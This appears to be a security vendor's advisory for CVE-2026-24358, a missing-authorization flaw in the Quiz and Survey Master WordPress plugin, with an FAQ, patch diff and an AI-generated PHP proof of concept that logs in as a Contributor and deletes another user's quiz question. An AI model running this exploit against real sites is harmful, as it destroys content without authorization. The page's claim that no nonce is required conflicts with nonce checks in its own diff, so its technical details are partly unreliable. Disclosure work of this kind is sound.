What is CVE-2026-24358?

CVE-2026-24358 is a medium-severity vulnerability in the Quiz and Survey Master (QSM) WordPress plugin, affecting versions up to and including 10.3.3. It is caused by a missing authorization check, allowing authenticated users with Contributor-level access or higher to perform unauthorized actions on quiz questions.

How does this vulnerability work?

The vulnerability allows attackers to exploit AJAX handlers in the plugin to modify quiz questions they do not own. By crafting specific POST requests to the WordPress admin-ajax.php endpoint, attackers can unlink, delete, or duplicate questions without proper authorization checks.

Who is affected by this vulnerability?

Any WordPress site using the Quiz and Survey Master plugin version 10.3.3 or earlier is at risk. Authenticated users with Contributor-level permissions can exploit this vulnerability to manipulate quiz content.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Quiz and Survey Master plugin installed. If it is version 10.3.3 or earlier, your site is at risk. Additionally, review user roles to identify if any Contributor-level users exist.

What are the implications of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized modifications of quiz content, potentially disrupting quiz integrity and availability. Attackers can delete or alter questions, which can corrupt quizzes and affect legitimate users.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Quiz and Survey Master plugin to version 10.3.4 or later, where the issue is patched. Regularly check for updates and apply them promptly to maintain security.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed. It is essential to take action to protect site integrity and user data.

What is a proof of concept in this context?

The proof of concept provided illustrates how an authenticated attacker can exploit the vulnerability by sending crafted requests to the vulnerable AJAX endpoints. It highlights the steps involved in authenticating and executing unauthorized actions on quiz questions.

What specific actions can an attacker perform?

An attacker can unlink, delete, or duplicate quiz questions that do not belong to them, leading to potential data loss and disruption of quiz functionality. This can severely impact the user experience for legitimate users.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately review user activity logs and quiz content for unauthorized changes. Consider restoring from a backup if necessary and ensure the plugin is updated to the latest version.

Are there any other vulnerabilities in the plugin?

While CVE-2026-24358 is a notable vulnerability, it is important to regularly audit your plugins for other potential security issues. Keep all plugins updated and monitor security advisories for any new vulnerabilities.

How can I enhance overall site security?

To enhance overall site security, implement strong user role management, regularly update all plugins and themes, use security plugins for monitoring, and conduct periodic security audits to identify and address vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24358: Quiz And Survey Master <= 10.3.3 – Missing Authorization (quiz-master-next)

CVE ID CVE-2026-24358

Plugin quiz-master-next

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 10.3.3

Patched Version 10.3.4

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24358:
This vulnerability is a missing authorization flaw in the Quiz and Survey Master (QSM) WordPress plugin. The vulnerability affects the plugin’s AJAX handlers for managing quiz questions. It allows authenticated users with Contributor-level permissions or higher to modify questions they do not own, violating the intended access controls.

Atomic Edge research identified the root cause in several AJAX handler functions within the file `quiz-master-next/php/admin/options-page-questions-tab.php`. The functions `qsm_ajax_unlink_question_from_list` (line 934), `qsm_ajax_save_pages_order` (line 1004), `qsm_ajax_delete_bulk_question` (line 1170), `qsm_ajax_duplicate_question` (line 1209), and `qsm_ajax_delete_question` (line 1286) all processed user-submitted `question_id` or `question_ids` parameters. These functions lacked a capability check to verify the current user had permission to modify the specified questions before executing operations like unlinking, deleting, or duplicating them.

The exploitation method involves an authenticated attacker with at least Contributor access crafting POST requests to the WordPress `admin-ajax.php` endpoint. The attacker must supply the `action` parameter matching the vulnerable AJAX hook names, such as `qsm_unlink_question_from_list` or `qsm_delete_question`. The request must also include the `question_id` or `question_ids` parameter targeting questions belonging to other users’ quizzes. No nonce or other authorization token is required, as the vulnerability is a missing capability check.

The patch introduces a new authorization function, `qsm_user_can_modify_question_ids`, defined at line 959. This function maps the supplied question IDs to their parent quizzes, retrieves the associated WordPress post, and checks if the current user is the post author or possesses the `edit_others_qsm_quizzes` capability. The patch adds a call to this function at the beginning of each vulnerable AJAX handler, before any data modification occurs. For example, line 934 adds a check that calls `qsm_user_can_modify_question_ids` and returns a JSON error on failure.

Successful exploitation allows an attacker to disrupt quiz integrity and availability. An attacker can unlink, delete, or duplicate questions from quizzes they do not own. This action can corrupt quiz content, break functionality for legitimate users, and potentially lead to data loss. The impact is limited to the quiz question data managed by the plugin and does not grant full site compromise.

Differential between vulnerable and patched code

Code Diff

--- a/quiz-master-next/mlw_quizmaster2.php
+++ b/quiz-master-next/mlw_quizmaster2.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: Quiz And Survey Master
  * Description: Easily and quickly add quizzes and surveys to your website.
- * Version: 10.3.3
+ * Version: 10.3.4
  * Author: ExpressTech
  * Author URI: https://quizandsurveymaster.com/
  * Plugin URI: https://expresstech.io/
@@ -43,7 +43,7 @@
 	 * @var string
 	 * @since 4.0.0
 	 */
-	public $version = '10.3.3';
+	public $version = '10.3.4';

 	/**
 	 * QSM Alert Manager Object
--- a/quiz-master-next/php/admin/options-page-questions-tab.php
+++ b/quiz-master-next/php/admin/options-page-questions-tab.php
@@ -934,6 +934,13 @@
 		);
 	}
 	$question_id = isset( $_POST['question_id'] ) ? intval( $_POST['question_id'] ) : 0;
+	if ( $question_id && ! qsm_user_can_modify_question_ids( array( $question_id ) ) ) {
+		wp_send_json_error(
+			array(
+				'message' => __( 'You are not allowed to modify this question.', 'quiz-master-next' ),
+			)
+		);
+	}
 	if ( $question_id > 0 ) {
 		qsm_process_unlink_question_from_list_by_question_id( $question_id );
 		wp_send_json_success(
@@ -952,6 +959,50 @@
 add_action( 'wp_ajax_qsm_unlink_question_from_list', 'qsm_ajax_unlink_question_from_list' );

 /**
+ * Checks whether current user can modify given question IDs based on quiz ownership.
+ *
+ * @param array $question_ids Question IDs.
+ *
+ * @return bool
+ */
+function qsm_user_can_modify_question_ids( $question_ids ) {
+	global $wpdb;
+
+	$question_ids = array_filter( array_map( 'intval', (array) $question_ids ) );
+	if ( empty( $question_ids ) ) {
+		return false;
+	}
+
+	$placeholders = implode( ', ', array_fill( 0, count( $question_ids ), '%d' ) );
+	$quiz_ids     = $wpdb->get_col(
+		$wpdb->prepare(
+			"SELECT DISTINCT quiz_id FROM {$wpdb->prefix}mlw_questions WHERE question_id IN ( $placeholders )",
+			$question_ids
+		)
+	);
+
+	$current_user = get_current_user_id();
+	foreach ( $quiz_ids as $quiz_id ) {
+		$post_id = $wpdb->get_var( $wpdb->prepare( "SELECT post_id FROM $wpdb->postmeta WHERE meta_key = 'quiz_id' AND meta_value = %d LIMIT 1", intval( $quiz_id ) ) );
+		// If quiz mapping is missing, only allow elevated users.
+		if ( empty( $post_id ) && ! current_user_can( 'edit_others_qsm_quizzes' ) ) {
+			return false;
+		}
+
+		if ( ! empty( $post_id ) ) {
+			$post_author = intval( get_post_field( 'post_author', $post_id, true ) );
+			$owns_quiz   = ( $post_author === $current_user );
+
+			if ( ( ! current_user_can( 'edit_qsm_quiz', $post_id ) || ! $owns_quiz ) && ! current_user_can( 'edit_others_qsm_quizzes' ) ) {
+				return false;
+			}
+		}
+	}
+
+	return true;
+}
+
+/**
  * Unlinks a question from all quizzes it is associated with.
  * @since 9.1.3
  * @param int $question_id The ID of the question to unlink.
@@ -1004,11 +1055,20 @@
 	}

 	global $mlwQuizMasterNext;
+	global $wpdb;
 	$json    = array(
 		'status' => 'error',
 	);
 	$quiz_id = isset( $_POST['quiz_id'] ) ? intval( $_POST['quiz_id'] ) : 0;
-	$post_id = isset( $_POST['post_id'] ) ? intval( $_POST['post_id'] ) : 0;
+
+	// Map quiz to its post and enforce edit capabilities.
+	$post_id    = $wpdb->get_var( $wpdb->prepare( "SELECT post_id FROM $wpdb->postmeta WHERE meta_key = 'quiz_id' AND meta_value = %d LIMIT 1", $quiz_id ) );
+	$post_author = get_post_field( 'post_author', $post_id, true );
+
+	if ( empty( $post_id ) || ( ( ! current_user_can( 'edit_qsm_quiz', $post_id ) || intval( $post_author ) !== get_current_user_id() ) && ! current_user_can( 'edit_others_qsm_quizzes' ) ) ) {
+		wp_die( esc_html__( 'You are not allowed to edit this quiz, You need higher permission!', 'quiz-master-next' ) );
+	}
+
 	$mlwQuizMasterNext->pluginHelper->prepare_quiz( $quiz_id );
 	$pages         = isset( $_POST['pages'] ) ? qsm_sanitize_rec_array( wp_unslash( $_POST['pages'] ) ) : array(); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
 	$qpages        = isset( $_POST['qpages'] ) ? qsm_sanitize_rec_array( wp_unslash( $_POST['qpages'] ) ) : array(); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
@@ -1170,6 +1230,18 @@
 	}
 	$question_ids = isset( $_POST['question_ids'] ) ? sanitize_text_field( wp_unslash( $_POST['question_ids'] ) ) : '';
 	$question_arr = explode( ',', $question_ids );
+	if ( $question_arr && ! qsm_user_can_modify_question_ids( $question_arr ) ) {
+		echo wp_json_encode(
+			array(
+				'success' => false,
+				'message' => __(
+					'You are not allowed to modify these questions.',
+					'quiz-master-next'
+				),
+			)
+		);
+		wp_die();
+	}
 	$response     = array();
 	if ( $question_arr ) {
 		global $wpdb;
@@ -1209,6 +1281,9 @@
 		wp_send_json_error( __( 'Nonce verification failed.', 'quiz-master-next' ) );
 	}
 	$base_question_id = $question_id = isset( $_POST['question_id'] ) ? intval( $_POST['question_id'] ) : 0;
+	if ( $question_id && ! qsm_user_can_modify_question_ids( array( $question_id ) ) ) {
+		wp_send_json_error( __( 'You are not allowed to modify this question.', 'quiz-master-next' ) );
+	}
 	if ( $question_id ) {

 		global $wpdb, $mlwQuizMasterNext;
@@ -1286,6 +1361,9 @@
 	$base_question_ids = $question_id = array_map( 'intval', $question_id );

 	if ( ! empty( $question_id ) ) {
+		if ( ! qsm_user_can_modify_question_ids( $question_id ) ) {
+			wp_send_json_error( __( 'You are not allowed to modify these questions.', 'quiz-master-next' ) );
+		}

 		$update_qpages_after_delete = array();
 		$connected_question_ids     = qsm_get_unique_linked_question_ids_to_remove( $question_id );
--- a/quiz-master-next/php/classes/class-qsm-results-pages.php
+++ b/quiz-master-next/php/classes/class-qsm-results-pages.php
@@ -362,7 +362,7 @@
 			if ( 'false' === $pages[ $i ]['redirect'] ) {
 				$pages[ $i ]['redirect'] = false;
 			} else {
-				$pages[ $i ]['redirect'] = esc_url( $pages[ $i ]['redirect'] );
+				$pages[ $i ]['redirect'] = false !== strpos( $pages[ $i ]['redirect'], '%RESULT_LINK%' ) ? $pages[ $i ]['redirect'] : esc_url( $pages[ $i ]['redirect'] );
 			}

 			/**

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24358 - Quiz And Survey Master <= 10.3.3 - Missing Authorization
<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'contributor';
$password = 'password';
$question_id_to_delete = 123; // ID of a question the user does not own

// Step 1: Authenticate and obtain WordPress cookies
$login_url = 'http://vulnerable-site.com/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'http://vulnerable-site.com/wp-admin/',
    'testcookie' => 1
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Exploit missing authorization to delete a question
// This targets the 'qsm_delete_question' AJAX action.
$post_data = array(
    'action' => 'qsm_delete_question',
    'question_id' => $question_id_to_delete
);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$ajax_response = curl_exec($ch);

// Check the response
if (strpos($ajax_response, 'success') !== false) {
    echo "[+] Success: Question deletion may have been executed.n";
    echo "Response: $ajax_responsen";
} else {
    echo "[-] Request completed. Response: $ajax_responsen";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-24358?
Overview of the vulnerability
CVE-2026-24358 is a medium-severity vulnerability in the Quiz and Survey Master (QSM) WordPress plugin, affecting versions up to and including 10.3.3. It is caused by a missing authorization check, allowing authenticated users with Contributor-level access or higher to perform unauthorized actions on quiz questions.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability allows attackers to exploit AJAX handlers in the plugin to modify quiz questions they do not own. By crafting specific POST requests to the WordPress admin-ajax.php endpoint, attackers can unlink, delete, or duplicate questions without proper authorization checks.
Who is affected by this vulnerability?
Identifying vulnerable users and systems
Any WordPress site using the Quiz and Survey Master plugin version 10.3.3 or earlier is at risk. Authenticated users with Contributor-level permissions can exploit this vulnerability to manipulate quiz content.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Quiz and Survey Master plugin installed. If it is version 10.3.3 or earlier, your site is at risk. Additionally, review user roles to identify if any Contributor-level users exist.
What are the implications of this vulnerability?
Potential risks and impacts
Exploitation of this vulnerability can lead to unauthorized modifications of quiz content, potentially disrupting quiz integrity and availability. Attackers can delete or alter questions, which can corrupt quizzes and affect legitimate users.
How can I fix or mitigate this issue?
Recommended actions for site administrators
To mitigate this vulnerability, update the Quiz and Survey Master plugin to version 10.3.4 or later, where the issue is patched. Regularly check for updates and apply them promptly to maintain security.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed. It is essential to take action to protect site integrity and user data.
What is a proof of concept in this context?
Demonstrating the vulnerability
The proof of concept provided illustrates how an authenticated attacker can exploit the vulnerability by sending crafted requests to the vulnerable AJAX endpoints. It highlights the steps involved in authenticating and executing unauthorized actions on quiz questions.
What specific actions can an attacker perform?
Potential exploitation scenarios
An attacker can unlink, delete, or duplicate quiz questions that do not belong to them, leading to potential data loss and disruption of quiz functionality. This can severely impact the user experience for legitimate users.
What should I do if I suspect exploitation?
Response steps for administrators
If you suspect that your site has been exploited, immediately review user activity logs and quiz content for unauthorized changes. Consider restoring from a backup if necessary and ensure the plugin is updated to the latest version.
Are there any other vulnerabilities in the plugin?
Broader security considerations
While CVE-2026-24358 is a notable vulnerability, it is important to regularly audit your plugins for other potential security issues. Keep all plugins updated and monitor security advisories for any new vulnerabilities.
How can I enhance overall site security?
Best practices for WordPress security
To enhance overall site security, implement strong user role management, regularly update all plugins and themes, use security plugins for monitoring, and conduct periodic security audits to identify and address vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations